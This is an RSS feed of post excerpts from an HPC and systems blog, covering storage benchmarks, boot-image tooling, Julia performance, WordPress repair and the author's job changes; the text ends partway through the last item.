<?xml version="1.0" encoding="utf-8" standalone="yes"?>
<rss version="2.0" xmlns:atom="http://www.w3.org/2005/Atom">
  <channel>
    <title>Posts on blog.scalability.org</title>
    <link>https://blog.scalability.org/posts/</link>
    <description>Recent content in Posts on blog.scalability.org</description>
    <generator>Hugo -- gohugo.io</generator>
    <language>en-us</language>
    <lastBuildDate>Sun, 08 Nov 2020 02:10:44 +0000</lastBuildDate><atom:link href="https://blog.scalability.org/posts/index.xml" rel="self" type="application/rss+xml" />
    <item>
      <title>On crushing older tests</title>
      <link>https://blog.scalability.org/2020/11/on-crushing-older-tests/</link>
      <pubDate>Sun, 08 Nov 2020 02:10:44 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2020/11/on-crushing-older-tests/</guid>
      <description>About 6 years ago, I wrote this, about a benchmark test that did a 2TB write in 73s or so, on pure spinning disk. That result was just so far out there, compared to pretty much anything else available, in terms of performance density (single rack of storage units). The hardware was Scalable Informatics Unison storage, designed to be an IO monster in all respects. It was. Way ahead of its time.</description>
    </item>
    
    <item>
      <title>On using legacy tooling in modern HPC systems</title>
      <link>https://blog.scalability.org/2020/11/on-using-legacy-tooling-in-modern-hpc-systems/</link>
      <pubDate>Tue, 03 Nov 2020 21:35:15 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2020/11/on-using-legacy-tooling-in-modern-hpc-systems/</guid>
      <description>Or as House MD may have put it
So there you are, working on a system with a group, when you realize that something is out of kilter. And you think to yourself &amp;hellip;
It’s not DNS
There is a no way it’s DNS
It was DNS
So your team works on resolving the issue. And the tooling they use &amp;hellip; the tooling.
Is from the late 80s/early 90s.
There are so many &amp;hellip; better &amp;hellip; easier to use &amp;hellip; tools.</description>
    </item>
    
    <item>
      <title>On risk and how to mitigate it</title>
      <link>https://blog.scalability.org/2020/10/on-risk-and-how-to-mitigate-it/</link>
      <pubDate>Wed, 28 Oct 2020 14:50:05 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2020/10/on-risk-and-how-to-mitigate-it/</guid>
      <description>On 1-March-2020, I wrote this article. In it I argued that the risk benefit/reward equations have been thrown out of kilter by the pandemic. Or maybe, rather than thrown out of kilter, maybe they are reverting to a more natural state, where risks that have been previously discounted, are now showing their true (or more nearly true) values.
A former SGI colleague, and now HBS professor, Willy Shih, wrote a great article on how management might wish to adapt to this reconfiguration of risk strength/value.</description>
    </item>
    
    <item>
      <title>On zeros</title>
      <link>https://blog.scalability.org/2020/10/on-zeros/</link>
      <pubDate>Fri, 16 Oct 2020 18:53:15 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2020/10/on-zeros/</guid>
      <description>Not a math post, I promise. Really about teams.
You have a team of people. You have a mission. You have a (short) timeline. You need them to focus on the problem, and find the minimum temporal path length process to achieve a resolution. You have a process, albeit informal, to address issues, which is in place, functioning well, solving problems.
Then someone loops someone else into the effort. Who starts quoting paragraph and verse out of how they would like it to work.</description>
    </item>
    
    <item>
      <title>Thoughts on configuration management vs image artefact management</title>
      <link>https://blog.scalability.org/2020/05/thoughts-on-configuration-management-vs-image-artefact-management/</link>
      <pubDate>Sat, 30 May 2020 21:07:18 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2020/05/thoughts-on-configuration-management-vs-image-artefact-management/</guid>
      <description>Years ago &amp;hellip; ok &amp;hellip; decades ago, when I was building my first large clusters, I worried about configuration and drift. OS installers are notoriously finicky, and one of the hard lessons is that you should spend as absolutely little time inside them as possible. Do the bare minimum work you need to in order to get a functional system, and handle everything else after the first boot.
I actually learned this lesson at SGI, while writing Autoinst, a tool to handle large scale OS deployment.</description>
    </item>
    
    <item>
      <title>R.I.P. Rich</title>
      <link>https://blog.scalability.org/2020/05/r-i-p-rich/</link>
      <pubDate>Mon, 25 May 2020 02:26:41 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2020/05/r-i-p-rich/</guid>
      <description>The link to his obituary. A wonderful person, deeply insightful, excellent communicator. Gone too soon.
I will miss him. I think everyone in #HPC will.</description>
    </item>
    
    <item>
      <title>On optimizing scripting languages, and where they are useful and where they are not</title>
      <link>https://blog.scalability.org/2020/05/on-optimizing-scripting-languages-and-where-they-are-useful-and-where-they-are-not/</link>
      <pubDate>Thu, 21 May 2020 14:26:03 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2020/05/on-optimizing-scripting-languages-and-where-they-are-useful-and-where-they-are-not/</guid>
      <description>So yesterday, an article and discussion appeared on Hacker News. In the article, the author asks reasonable questions, of how to optimize a Python code. What happened next, probably wasn&amp;rsquo;t as they intended.
The article was, ostensibly, on optimizing Python code. It, after the 4th attempt at source level optimization, switched languages. It was no longer written in Python, this attempt to optimize &amp;hellip; Python code.
Ok. So the code they were &amp;ldquo;optimizing&amp;rdquo; was trivial, and not really indicative of any particular workload.</description>
    </item>
    
    <item>
      <title>Updating compressors for NyBLE</title>
      <link>https://blog.scalability.org/2020/05/updating-compressors-for-nyble/</link>
      <pubDate>Mon, 18 May 2020 00:55:56 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2020/05/updating-compressors-for-nyble/</guid>
      <description>Compressing tools like gzip and bzip2 have been around quite a long time. They are, well, mature. Almost boring. You depend upon them for many things.
You don&amp;rsquo;t really pay attention to them until you use them for significant work. Like with NyBLE, compression and decompression are important, and time sensitive steps &amp;hellip; well &amp;hellip; decompression is anyway &amp;hellip; in the boot process.
My preference is generally for tools that enable me to use the full processing power of an underlying machine.</description>
    </item>
    
    <item>
      <title>My urgent #HPC computational project, COVID-19 related</title>
      <link>https://blog.scalability.org/2020/05/my-urgent-hpc-computational-project-covid-19-related/</link>
      <pubDate>Tue, 05 May 2020 17:19:23 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2020/05/my-urgent-hpc-computational-project-covid-19-related/</guid>
      <description>This is the project that I alluded to. We tuned the system, the code, the environment. We wrote tooling to massively simplify job creation and submission. Moreover, we worked around numerous issues that arise in each technological layer.
Multiple simultaneous tools are being deployed to work on this, and I am hopeful that the net result of this are a few small molecules that will have action against this disease.</description>
    </item>
    
    <item>
      <title>Time to replace some hardware</title>
      <link>https://blog.scalability.org/2020/04/time-to-replace-some-hardware/</link>
      <pubDate>Wed, 29 Apr 2020 03:45:24 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2020/04/time-to-replace-some-hardware/</guid>
      <description>I built an updated raid pair of drives with a brand new OS for the system that underlies this blog and other services. Basically, the previous system load had been updated from debian 7 through debian 9 and had accumulated lots of cruft. So I rebuilt this using my wonderful nyble system on a lab machine. I moved most of the config over from the live system.
Switched over and spent about 2 hours fixing up the missing services (things I forgot to enable, etc.</description>
    </item>
    
    <item>
      <title>Updated nyble to support ubuntu 20.04 LTS and debian 10</title>
      <link>https://blog.scalability.org/2020/04/updated-nyble-to-support-ubuntu-20-04-lts-and-debian-10/</link>
      <pubDate>Mon, 27 Apr 2020 20:40:03 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2020/04/updated-nyble-to-support-ubuntu-20-04-lts-and-debian-10/</guid>
      <description>For those who don&amp;rsquo;t know what nyble is &amp;hellip; you can read an old post here. The short version is that it gives you an always reproducible bootable ramdisk (or stateful if you need) image (installation for stateful folk). You avoid worrying about configuration drift, as you roll a new image in ~10-20 minutes, and turn a configuration management problem into a simpler image management problem. Which may be solved with a database backed booting system like, I dunno, tiburon with minio providing the data store.</description>
    </item>
    
    <item>
      <title>There are no silver bullets</title>
      <link>https://blog.scalability.org/2020/04/there-are-no-silver-bullets-2/</link>
      <pubDate>Sat, 25 Apr 2020 16:24:09 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2020/04/there-are-no-silver-bullets-2/</guid>
      <description>In the world in which we reside, a pandemic slowly burns. This pandemic has confounded front line medical practitioners, public health organizations. It has exposed a number of troubling relationships amongst governments and organizations. It has resulted in numerous pronoucements of &amp;ldquo;X may work&amp;rdquo; from medically and scientifically illiterate political leaders.
The problem is, fundamentally, there are no silver bullets. There are no magic cures.
There is no replacement for the hard work required to devise safe and effective mitigations, and hopefully preventatives such as vaccines.</description>
    </item>
    
    <item>
      <title>Performance of a julia code: Riemann ζ function implemented on CPU and GPU</title>
      <link>https://blog.scalability.org/2020/04/performance-of-a-julia-code-riemann-%ce%b6-function-implemented-on-cpu-and-gpu/</link>
      <pubDate>Sat, 25 Apr 2020 02:18:17 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2020/04/performance-of-a-julia-code-riemann-%ce%b6-function-implemented-on-cpu-and-gpu/</guid>
      <description>I&amp;rsquo;ve been playing with Julia for a while now. As the language is evolving quickly, I have to learn and relearn various aspects. Happily, since 1.0 dropped a while ago, its been more consistent, and the rate of change is lower than in the past.
The Riemann ζ function is an interesting problem to test a number of mechanisms for parallelism with. The function itself is simple to write
$$\zeta(a) = \sum_{i=1}^\infty \frac{1}{i^a}$$</description>
    </item>
    
    <item>
      <title>Topical #HPC project at the $dayjob</title>
      <link>https://blog.scalability.org/2020/04/fun-and-topical-hpc-project-at-the-dayjob/</link>
      <pubDate>Sat, 25 Apr 2020 00:58:32 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2020/04/fun-and-topical-hpc-project-at-the-dayjob/</guid>
      <description>(caution: I get personal at the end of this, you can see my motivation for working on this)
I can&amp;rsquo;t talk in depth about it though, yet. I can talk in broad brush strokes for now.
Imagine for a moment, that you have a combination of available high performance supercomputers, an urgent problem to be solved, and a collection of people, computing tools, and data. Imagine that you are one of many stages in this process, but you are, for the moment, a bottlenecking process.</description>
    </item>
    
    <item>
      <title>In the face of disruptive events</title>
      <link>https://blog.scalability.org/2020/03/in-the-face-of-disruptive-events/</link>
      <pubDate>Sun, 01 Mar 2020 16:01:24 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2020/03/in-the-face-of-disruptive-events/</guid>
      <description>As of the day this post is being written, a virus has been spreading globally. Details of the virus (SARS-CoV-2) and it&amp;rsquo;s spread (nCoV-19) are being discussed across the globe. There is much in the way of fear, and fear-inspired reactions. Visit any airport, and note the number of people wearing what amounts to ineffectual face masks. All the while, doctors are trying to get common sense messages out about prevention and preparation.</description>
    </item>
    
    <item>
      <title>Whats coming in #HPC</title>
      <link>https://blog.scalability.org/2020/01/whats-coming-in-hpc/</link>
      <pubDate>Thu, 02 Jan 2020 17:06:01 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2020/01/whats-coming-in-hpc/</guid>
      <description>I am planning on getting back to a more regular cadence of writing. I enjoy it, and hopefully, I don&amp;rsquo;t annoy (all) readers.
A brief retrospective on what has been over the last decade first.
First, having experienced this first hand, its important to talk about the use pattern shifts. In 2010, cloud for HPC workloads wasn&amp;rsquo;t even an afterthought. Basically the large cloud provider (AWS) and the wannabes were building cheap machines and maximizing tenancy.</description>
    </item>
    
    <item>
      <title>Updated io-bm and results from system I was working on</title>
      <link>https://blog.scalability.org/2019/12/updated-io-bm-and-results-from-system-i-was-working-on/</link>
      <pubDate>Fri, 20 Dec 2019 18:29:24 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2019/12/updated-io-bm-and-results-from-system-i-was-working-on/</guid>
      <description>For those who aren&amp;rsquo;t aware, I had written (a long, long time ago) a simple IO benchmark test, when I had been displeased with the (at the time) standard tools. Since then fio has come out and been quite useful, though somewhat orthogonal to what I wanted to use.
The new results are at the bottom, I&amp;rsquo;ll explain later.
Let me explain. At a high level, you want your test runs on your IO system to place your system under heavy sustained load, to explore the holistic system behavior.</description>
    </item>
    
    <item>
      <title>On the importance of saying &#34;no&#34;</title>
      <link>https://blog.scalability.org/2019/12/on-the-importance-of-saying-no/</link>
      <pubDate>Fri, 20 Dec 2019 16:40:24 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2019/12/on-the-importance-of-saying-no/</guid>
      <description>Often times, when we are working on a project with a well defined set of milestones, we&amp;rsquo;ll be asked to add something to the list of tasks. These asks may be simple and quick, or long and time consuming.
One thing each ask does, is increase the scoping of the milestone, increase the risk surface, and add additional criterion to the milestone. This means, each ask needs careful thought on the net increase in risk versus the net increase in value, or net loss to opportunity cost by not acting on the ask.</description>
    </item>
    
    <item>
      <title>Updated net-tools with fixes and license change</title>
      <link>https://blog.scalability.org/2019/12/updated-net-tools-with-fixes-and-license-change/</link>
      <pubDate>Thu, 05 Dec 2019 00:29:38 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2019/12/updated-net-tools-with-fixes-and-license-change/</guid>
      <description>Its been a while, I know. My apologies.
Ok, first off, I&amp;rsquo;ve been very busy at the $dayjob. More in a later post. But I&amp;rsquo;ve been doing some code fix up for a number of my tools, specifically the net-tools collection. This one had nagged me a long time.
Ok, here it is in a nutshell. The way lsnet worked, it used fixed sized columns for, unfortunately, variable sized fields.</description>
    </item>
    
    <item>
      <title>Apologies for the long delay in posting</title>
      <link>https://blog.scalability.org/2019/08/apologies-for-the-long-delay-in-posting/</link>
      <pubDate>Thu, 29 Aug 2019 03:16:29 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2019/08/apologies-for-the-long-delay-in-posting/</guid>
      <description>I have to be quite careful to not discuss $dayjob stuff here. Which, as that consumes a large chunk of my daytime (a bit more than 8h/day), leaves me with precious little time for me.
But I enjoy this position, and the company. It is nice to be part of an organization that values (deep) experience.</description>
    </item>
    
    <item>
      <title>When you see someone deploying a business model very similar to one you had developed on your own ...</title>
      <link>https://blog.scalability.org/2019/05/when-you-see-someone-deploying-a-business-model-very-similar-to-one-you-had-developed-on-your-own/</link>
      <pubDate>Fri, 24 May 2019 04:12:11 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2019/05/when-you-see-someone-deploying-a-business-model-very-similar-to-one-you-had-developed-on-your-own/</guid>
      <description>I learned today, of the HPE Greenlake flex system. It has a nice infographic which describes it. What struck me, was that this was a model very similar to something I had worked on in 2014-2015, that I had been trying to raise capital to execute against, at Scalable Informatics (RIP).
The question the VCs put to us was, will this model work. My model had a number of different elements to this, in the sense that this is a smaller version of what I had envisioned.</description>
    </item>
    
    <item>
      <title>Length and complexity of supply chain as a risk factor for HPC and storage</title>
      <link>https://blog.scalability.org/2019/05/length-and-complexity-of-supply-chain-as-a-risk-factor-for-hpc-and-storage/</link>
      <pubDate>Thu, 23 May 2019 16:00:11 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2019/05/length-and-complexity-of-supply-chain-as-a-risk-factor-for-hpc-and-storage/</guid>
      <description>We&amp;rsquo;ve seen issues in the past, with massive flooding in Thailand, wreaking havoc on critical components in supply chains. The subsequent demonstration of the basic economics laws of supply and demand did not make users or vendors very happy.
This arose due to a significant over-allocation of one small geographical region to a critical component in offerings. To a degree, this also pushed companies to start looking at how to make this &amp;ldquo;Somebody Elses Problem&amp;rdquo; (e.</description>
    </item>
    
    <item>
      <title>Slightly more complexity than I had thought, or RTFM!</title>
      <link>https://blog.scalability.org/2019/05/slightly-more-complexity-than-i-had-thought-or-rtfm/</link>
      <pubDate>Thu, 23 May 2019 15:35:17 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2019/05/slightly-more-complexity-than-i-had-thought-or-rtfm/</guid>
      <description>[mathjax]
So I&amp;rsquo;m playing with Julia in my off time to get more proficient with it. Doing some &amp;ldquo;simple&amp;rdquo; things in preparation for the work I want to do.
One of the things I like to play with are environments linear algebra capabilities. This was one of my favorite areas as an undergraduate (cringe) years ago, and has been an important tool for me throughout my previous pre-professional career, working on a Ph.</description>
    </item>
    
    <item>
      <title>Nyble FTW! Installing my rambooted environment on linux laptop for rescue with grub</title>
      <link>https://blog.scalability.org/2019/05/nyble-ftw-installing-my-rambooted-environment-on-linux-laptop-for-rescue-with-grub/</link>
      <pubDate>Fri, 10 May 2019 16:57:23 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2019/05/nyble-ftw-installing-my-rambooted-environment-on-linux-laptop-for-rescue-with-grub/</guid>
      <description>Ok, this came about from many hours &amp;hellip; HOURS &amp;hellip; of not being able to get rescue CD images to boot correctly on my laptop, or in VMs. Things were broken on them, that I could not fix.
That&amp;rsquo;s when the thought occurred to me &amp;hellip; hey &amp;hellip; I&amp;rsquo;d developed this great project nyble (pronounced nibble), which I build full linux environments from baseline distros (currently debian9, CentOS7, Ubuntu18.04), and can be trivially PXE booted, USB booted, or local install booted.</description>
    </item>
    
    <item>
      <title>displayport KVMs for sharing monitors and keyboards</title>
      <link>https://blog.scalability.org/2019/05/displayport-kvms-for-sharing-monitors-and-keyboards/</link>
      <pubDate>Fri, 10 May 2019 16:16:08 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2019/05/displayport-kvms-for-sharing-monitors-and-keyboards/</guid>
      <description>I&amp;rsquo;ve got a pair of Samsung 28 inch 4k monitors that I use for my daily environment. I have 3 (actually 4) machines to share them between, 2(3) linux boxen and 1 Mac laptop.
In my original design, pre-KVM switch, I had one monitor dedicated to the Mac, and one switched with the annoying little joystick at the back of the monitor, with a little set of 3 USB cords, a powered USB hub, and simple plugging/unplugging.</description>
    </item>
    
    <item>
      <title>Joining @cray_inc to help drive #HPC solutions in the #cloud</title>
      <link>https://blog.scalability.org/2019/04/joining-cray_inc-to-help-drive-hpc-solutions-in-the-cloud/</link>
      <pubDate>Sun, 14 Apr 2019 21:49:50 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2019/04/joining-cray_inc-to-help-drive-hpc-solutions-in-the-cloud/</guid>
      <description>Quick post &amp;hellip; I&amp;rsquo;m excited to note that I&amp;rsquo;ll be joining Cray, the preeminent HPC company, to help develop solutions for HPC customers to consume supercomputing resources in the cloud. I start the week of the 22-April.
More soon, but I gotta say, I&amp;rsquo;m quite excited about this!</description>
    </item>
    
    <item>
      <title>Paint splatters as Perl programs?</title>
      <link>https://blog.scalability.org/2019/04/paint-splatters-as-perl-programs/</link>
      <pubDate>Fri, 05 Apr 2019 02:30:01 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2019/04/paint-splatters-as-perl-programs/</guid>
      <description>So I saw this , and yes, it is quite funny. There&amp;rsquo;s a discussion of this at HackerNews, which seems to follow a number of conventional pathways. Most of them missing the obvious implied humor.</description>
    </item>
    
    <item>
      <title>Onward and upward in #HPC</title>
      <link>https://blog.scalability.org/2019/04/onward-and-upward-in-hpc/</link>
      <pubDate>Thu, 04 Apr 2019 21:23:31 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2019/04/onward-and-upward-in-hpc/</guid>
      <description>A short note - today was my last day with Joyent. They are a wonderful company, building great things. Excellent technology, and technologists. I wish them nothing but success.
For the immediate future, I&amp;rsquo;ll be working on consulting projects, as well as looking for the next great opportunity within high performance computing, storage, cloud.
I&amp;rsquo;m always reachable here or at joe @ nlytiq . com</description>
    </item>
    
    <item>
      <title>Note to self: have only one blog VM running</title>
      <link>https://blog.scalability.org/2019/03/note-to-self-have-only-one-blog-vm-running/</link>
      <pubDate>Tue, 26 Mar 2019 19:42:46 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2019/03/note-to-self-have-only-one-blog-vm-running/</guid>
      <description>Yeah &amp;hellip; this was a fun one. Because I only recently started using a holistic VM management/control plane for my home machines, I didn&amp;rsquo;t notice that I had 2 VMs of the blog running.
I was doing some surgery to fix something, then tailed the logs &amp;hellip; and didn&amp;rsquo;t see the traffic.
Took me a little sanity checking, like, a quick poweroff and forcefully refreshing the page. Since the DB is on a different machine, the blog frontends were acting independently.</description>
    </item>
    
    <item>
      <title>Data loss, thanks to buggy driver or hardware</title>
      <link>https://blog.scalability.org/2019/02/data-loss-thanks-to-buggy-driver-or-hardware/</link>
      <pubDate>Wed, 06 Feb 2019 17:41:41 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2019/02/data-loss-thanks-to-buggy-driver-or-hardware/</guid>
      <description>So this happened on the 3rd, on one of my systems
Feb 3 03:02:39 calculon kernel: [195271.041118] INFO: task kworker/20:2:757 blocked for more than 120 seconds. Feb 3 03:02:39 calculon kernel: [195271.048116] Not tainted 4.20.6.nlytiq #1 Feb 3 03:02:39 calculon kernel: [195271.052678] &amp;quot;echo 0 &amp;gt; /proc/sys/kernel/hung_task_timeout_secs&amp;quot; disables this message. Feb 3 03:02:39 calculon kernel: [195271.060626] kworker/20:2 D 0 757 2 0x80000000 Feb 3 03:02:39 calculon kernel: [195271.066238] Workqueue: md submit_flushes [md_mod] Feb 3 03:02:39 calculon kernel: [195271.</description>
    </item>
    
    <item>
      <title>Interesting articles on systemd and ZFS</title>
      <link>https://blog.scalability.org/2019/01/interesting-articles-on-systemd-and-zfs/</link>
      <pubDate>Tue, 29 Jan 2019 01:36:48 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2019/01/interesting-articles-on-systemd-and-zfs/</guid>
      <description>The systemd article is on LWN, and discusses the &amp;ldquo;tragedy&amp;rdquo; of it. The ZFS post was linked from HackerNews and discusses risk to ZFS&amp;rsquo;s future from the perspective of FreeBSD leveraging ZFS on Linux as its upstream.
Ok, first onto systemd. For those who don&amp;rsquo;t know systemd, think of it as the borg that ate init. And upstart. And &amp;hellip; Basically, it is a replacement infrastructure for running services on Linux.</description>
    </item>
    
    <item>
      <title>Reflections on where we&#39;ve been in HPC, and thoughts on where we are going</title>
      <link>https://blog.scalability.org/2019/01/reflections-on-where-weve-been-in-hpc-and-thoughts-on-where-we-are-going/</link>
      <pubDate>Sun, 20 Jan 2019 20:28:17 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2019/01/reflections-on-where-weve-been-in-hpc-and-thoughts-on-where-we-are-going/</guid>
      <description>Looking back on past reviews from 2013 and a few other posts, and what has changed since then up to 2019 (its early, I know), I am struck by a particular thought I&amp;rsquo;ve expressed for decades now.
In 2009 I wrote
  Down market, in this case, means wider use &amp;hellip; explicit or implicit &amp;hellip; integrated in more business processes. All the while, becoming orders of magnitude less expensive per computational operation, easier to use and interface with.</description>
    </item>
    
    <item>
      <title>Systems that are designed to fail, often do</title>
      <link>https://blog.scalability.org/2018/12/systems-that-are-designed-to-fail-often-do/</link>
      <pubDate>Tue, 18 Dec 2018 05:32:14 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2018/12/systems-that-are-designed-to-fail-often-do/</guid>
      <description>I&amp;rsquo;ve been saying this for mumble decades. What I mean by &amp;ldquo;designed to fail&amp;rdquo; isn&amp;rsquo;t specifically that someone wants a system to fail. Rather, by various interactions, wishful thinking, drinking of one&amp;rsquo;s own kool-aid, a system is placed on an inexorable path to failure. Without something to divert it in time, failure is the most probable outcome.
Watching these failures unfold can strike terror in one&amp;rsquo;s heart. Especially when you realize that you yourself have not been able to nudge the system onto a sane path.</description>
    </item>
    
    <item>
      <title>With every update, MacOSX becomes harder to build for</title>
      <link>https://blog.scalability.org/2018/12/with-every-update-macosx-becomes-harder-to-build-for/</link>
      <pubDate>Sun, 02 Dec 2018 20:25:41 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2018/12/with-every-update-macosx-becomes-harder-to-build-for/</guid>
      <description>Way back in the good old 90s, we had very different versions of various unix systems. SunOS/Solaris, Irix, AIX, HP/UX, this upstart Linux, and some BSD things floating about. Of course, windows NT and others were starting to peek out then, and they had a &amp;ldquo;POSIX subsystem&amp;rdquo;.
Cross platform builds were generally speaking, a nightmare. While POSIX is a spec, writing to it didn&amp;rsquo;t guarantee that your application would work on a range of machines and OSes.</description>
    </item>
    
    <item>
      <title>Opening keynote @Supercomputing #SC18 : #HPC is an enabling technology ...</title>
      <link>https://blog.scalability.org/2018/11/opening-keynote-supercomputing-sc18-hpc-is-an-enabling-technology/</link>
      <pubDate>Tue, 13 Nov 2018 16:24:43 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2018/11/opening-keynote-supercomputing-sc18-hpc-is-an-enabling-technology/</guid>
      <description>&amp;hellip; Ok, the speaker said far more than that. But one of his central theses is that in this &amp;ldquo;second&amp;rdquo; machine revolution, we are enabling data driven decision making, distributed decision and consensus, as well as expanding beyond the confines of specific expertise in a field. The latter I&amp;rsquo;ve heard described as cross fertilization &amp;hellip; gather a bunch of smart people &amp;ldquo;together&amp;rdquo; and give them a problem spec. Let them run with it.</description>
    </item>
    
    <item>
      <title>#HPC in all the things</title>
      <link>https://blog.scalability.org/2018/11/hpc-in-all-the-things/</link>
      <pubDate>Fri, 09 Nov 2018 16:59:25 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2018/11/hpc-in-all-the-things/</guid>
      <description>I read this announcement this morning. Our friends at Facebook releasing their reduced precision server side convolution and GEMM operations.
Many years ago, I tried to convince people that HPC moves both down market, into lower cost hardware, as well as more widely into more software toolchains. Basically, the decades of experience building very high performance applications and systems will have value downstream for many users over time.
GEMM is a generalized approach to a matrix multiply, which has been well optimized for HPC applications in various scientific libraries over time.</description>
    </item>
    
    <item>
      <title>Looking forward to #SC18 next week and a discussion of all things #HPC</title>
      <link>https://blog.scalability.org/2018/11/looking-forward-to-sc18-next-week-and-a-discussion-of-all-things-hpc/</link>
      <pubDate>Tue, 06 Nov 2018 16:19:42 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2018/11/looking-forward-to-sc18-next-week-and-a-discussion-of-all-things-hpc/</guid>
      <description>I&amp;rsquo;m attending SC18 next week. It&amp;rsquo;s been 3 years since I last attended (2015). Then we (@scalableinfo) had a large booth, lots of traffic, and showed off some of the first commercial NVMe high performance storage systems running BeeGFS over 100GbE.
I am looking forward to talking with as many people as I can, to get their perspectives on things. To see what they are thinking, hear what they are doing, and in which direction they are going.</description>
    </item>
    
    <item>
      <title>A bug in s3 buckets with no apparent way to request support to deal with it</title>
      <link>https://blog.scalability.org/2018/09/a-bug-in-s3-buckets-with-no-apparent-way-to-request-support-to-deal-with-it/</link>
      <pubDate>Tue, 25 Sep 2018 16:39:29 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2018/09/a-bug-in-s3-buckets-with-no-apparent-way-to-request-support-to-deal-with-it/</guid>
      <description>This is a fun one, I&amp;rsquo;ve been playing with for the last 5 days or so. I&amp;rsquo;m helping someone out with backups, and they changed their mind on what they wanted backed up. So I started deleting the backups they didn&amp;rsquo;t want.
One of the machines contained a set of directories for hashdeep which includes a number of test cases. One set of test cases are deeply linked directories.
So, the aws s3 cp /localpath s3://yadda/yadda --recursive  copied this and many other files up to the bucket.</description>
    </item>
    
    <item>
      <title>Finally posted Tiburon on github</title>
      <link>https://blog.scalability.org/2018/08/finally-posted-tiburon-on-github/</link>
      <pubDate>Tue, 21 Aug 2018 14:53:02 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2018/08/finally-posted-tiburon-on-github/</guid>
      <description>Tiburon specifically solves the problem of stateful vs stateless boots, roll forward/backwards in images, consistent booting with immutable images. Coupled with an image generator and a programmatic config environment (as in Nyble and other tools), you have the workings of the non storage/networking parts of a cloud or cluster manager.
The philosophy behind this has to do with the pain associated with config/OS drift, failed upgrades/roll backs, failed boot drives, etc.</description>
    </item>
    
    <item>
      <title>Well ... that was fun</title>
      <link>https://blog.scalability.org/2018/08/well-that-was-fun-2/</link>
      <pubDate>Thu, 02 Aug 2018 06:00:13 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2018/08/well-that-was-fun-2/</guid>
      <description>So &amp;hellip; I&amp;rsquo;ve had this blog since 2005. I installed it from original sources. And WP made upgrades in the 2.x time frame, quite painless.
Or so it seemed.
Slowly, over time, some configuration/settings/whatever got out of whack. And with the last update, from a system originally installed in final form in 2013 or so, something broke.
I am not sure what. But the symptoms were simple &amp;hellip; new posts would replace the most recent posts.</description>
    </item>
    
    <item>
      <title>Wordpress is recovering (was very sick)</title>
      <link>https://blog.scalability.org/2018/08/qweqwe/</link>
      <pubDate>Wed, 01 Aug 2018 15:15:55 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2018/08/qweqwe/</guid>
      <description>Please note: Wordpress appears to be failing badly at this stage. I&amp;rsquo;ll be working on a fix this week, and likely will create a new site out of different, less buggy code. I&amp;rsquo;ve checked the DB, moved it to a different machine, restored from a known working backup. It appears a recent update of WP managed to completely screw up post handling. I disabled all plugins, ran health checks, etc. I&amp;rsquo;ve cleaned cookies, browsing history, used different browsers on different machines, with exactly the same outcome.</description>
    </item>
    
    <item>
      <title>So I&#39;ve got ideas for two businesses</title>
      <link>https://blog.scalability.org/2018/07/so-ive-got-ideas-for-two-businesses/</link>
      <pubDate>Wed, 25 Jul 2018 03:13:21 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2018/07/so-ive-got-ideas-for-two-businesses/</guid>
      <description>Neither one is a computer related. Both are based upon what I see as unmet needs for various groups. One is a definitely &amp;ldquo;gotta have&amp;rdquo; for one group. The other group, there is one &amp;ldquo;solution&amp;rdquo; on the market that I looked at, and it&amp;rsquo;s pretty pathetic. The other uses technology where it should be using chemistry, as the tech is simply way too expensive for mass use, and quite inflexible. Both are B2C.</description>
    </item>
    
    <item>
      <title>Typecasting and the &#34;trust us&#34; factor</title>
      <link>https://blog.scalability.org/2018/07/typecasting-and-the-trust-us-factor/</link>
      <pubDate>Wed, 18 Jul 2018 23:24:26 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2018/07/typecasting-and-the-trust-us-factor/</guid>
      <description>Finding myself on the other side of the table in the consumer-vendor relationship has resulted in some eye opening experiences. These are things I look back on, and realize that I strenuously avoided doing during my Scalable days. But I see everyone doing it now, as they try to sell me stuff, or convince me to use things. One of the eye opening things is a bit of typecasting of sorts.</description>
    </item>
    
    <item>
      <title>How to handle curious conversations ... part 1 of a few billion</title>
      <link>https://blog.scalability.org/2018/06/how-to-handle-curious-conversations-part-1-of-a-few-billion/</link>
      <pubDate>Tue, 05 Jun 2018 17:22:08 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2018/06/how-to-handle-curious-conversations-part-1-of-a-few-billion/</guid>
